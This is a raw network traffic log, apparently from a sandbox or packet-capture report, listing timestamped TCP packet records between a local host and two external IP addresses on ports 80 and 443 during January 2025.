                                                                                                                                          Jan 6, 2025 07:54:06.332843065 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332849026 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332885981 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.332937956 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332948923 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332961082 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332973003 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332983971 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.332983971 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333007097 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333029032 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333095074 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333106995 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333117962 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333146095 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333148956 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333158016 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333169937 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333189011 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333200932 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333201885 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333280087 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333291054 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333302975 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333313942 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333336115 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333353043 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.333431005 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333451033 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.333476067 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425209045 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425220013 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425234079 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425318003 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425331116 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425375938 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425400972 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425425053 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425438881 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425451040 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425461054 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425462961 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425472975 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425479889 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425486088 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425498009 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425508976 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425537109 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425558090 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425570011 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425580978 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425590992 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425601959 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425611973 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425615072 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425626040 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425640106 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425698042 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425709963 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425720930 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.425744057 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.425766945 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.432143927 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.558717012 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558728933 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558739901 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558756113 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558767080 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558775902 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558787107 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558804035 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558814049 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558900118 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558909893 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558927059 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558938980 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558940887 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.558940887 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.558955908 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558958054 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.558958054 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.558969021 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558980942 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.558991909 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559025049 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559075117 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559087038 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559097052 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559107065 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559118032 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559123993 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559143066 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559144020 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559154987 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559165955 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559175968 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559185982 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559190035 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559197903 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559204102 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559231997 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559282064 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559293985 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559303999 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559320927 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559329033 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559331894 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559344053 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559355974 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559357882 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559381008 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559391975 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559433937 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559447050 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559458017 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559473991 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559479952 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559485912 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559513092 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559519053 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559524059 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559535027 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559560061 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559568882 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559602976 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559617996 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559629917 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559638977 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559650898 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559660912 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.559662104 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559672117 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.559689045 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.560038090 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.564968109 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565001965 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565013885 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565031052 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565042019 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565054893 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565079927 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565120935 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565123081 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565146923 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565157890 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565164089 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565171003 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565181971 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565200090 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565227032 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565259933 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565311909 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565323114 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565334082 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565345049 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565356016 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565356970 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565367937 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565371990 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565380096 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565395117 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565398932 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565409899 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.565412045 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565423965 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565435886 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.565459967 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653954029 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653956890 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653960943 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653971910 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653983116 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653995991 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654022932 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654030085 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654036999 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654047966 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654058933 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654068947 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654073000 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654099941 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654108047 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654112101 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654129028 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654139996 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654150963 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654154062 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654161930 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654191971 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654191971 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654215097 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654226065 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654236078 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654251099 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654256105 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654263020 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654268026 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654280901 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654310942 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654357910 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654373884 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654383898 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654395103 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654400110 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654407978 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654418945 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654431105 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654434919 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654443026 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654452085 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654469013 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654479027 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654485941 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654488087 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654524088 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.717616081 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.780998945 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781023026 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781033993 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781053066 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781064987 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781088114 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781100035 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781114101 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781119108 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781130075 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781138897 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781141996 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781172037 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781191111 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781203032 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781213999 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781232119 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781255960 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781259060 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781277895 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781290054 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781301975 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781318903 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781347036 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781352997 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781358957 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781369925 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781403065 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781411886 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781421900 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781428099 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781434059 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781470060 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781900883 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781913042 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781925917 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781939030 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781943083 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781958103 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781970024 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781970978 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781986952 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781996012 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782000065 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782008886 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782020092 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782021999 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782052040 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782061100 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782063007 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782092094 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782432079 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782450914 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782464027 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782474041 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782507896 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782583952 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782601118 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782613039 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782618046 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782623053 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782629013 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782639980 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782649994 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782653093 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782661915 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782680988 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782691956 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782701969 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782711983 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782728910 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782737017 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782761097 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782780886 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782793045 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782804012 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782819986 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782823086 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782850027 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782901049 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782923937 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782936096 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782959938 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782982111 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783001900 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783013105 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783025980 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783042908 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:20.321296930 CET44353604188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:20.342284918 CET53604443192.168.2.5188.114.97.3
